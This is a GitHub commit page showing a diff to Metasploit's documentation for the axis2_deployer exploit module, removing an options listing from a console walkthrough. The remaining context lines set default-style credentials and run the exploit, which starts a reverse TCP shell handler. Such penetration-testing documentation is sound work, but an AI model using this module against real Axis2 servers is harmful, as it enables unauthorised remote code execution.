Skip to content

Commit 48a56d8

Browse files
committed
Documentation on axis2_deployer updated 1.4
1 parent 8d618ce commit 48a56d8

File tree

1 file changed

+0
-22
lines changed

1 file changed

+0
-22
lines changed

documentation/modules/exploit/multi/http/axis2_deployer.md

Lines changed: 0 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -29,28 +29,6 @@ msf exploit(axis2_deployer) > set USERNAME admin
2929
USERNAME => admin
3030
msf exploit(axis2_deployer) > set PASSWORD admin123
3131
PASSWORD => admin123
32-
msf exploit(axis2_deployer) > show options
33-
34-
Module options (exploit/multi/http/axis2_deployer):
35-
36-
Name Current Setting Required Description
37-
---- --------------- -------- -----------
38-
PASSWORD admin123 no The password for the specified username
39-
PATH /axis2 yes The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
40-
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
41-
RHOST 10.10.155.37 yes The target address
42-
RPORT 8080 yes The target port
43-
SSL false no Negotiate SSL/TLS for outgoing connections
44-
USERNAME admin no The username to authenticate as
45-
VHOST no HTTP server virtual host
46-
47-
48-
Exploit target:
49-
50-
Id Name
51-
-- ----
52-
0 Java
53-
5432
msf exploit(axis2_deployer) > exploit
5533
5634
[*] Started reverse TCP handler on 10.10.155.39:4444

0 commit comments

Comments
 (0)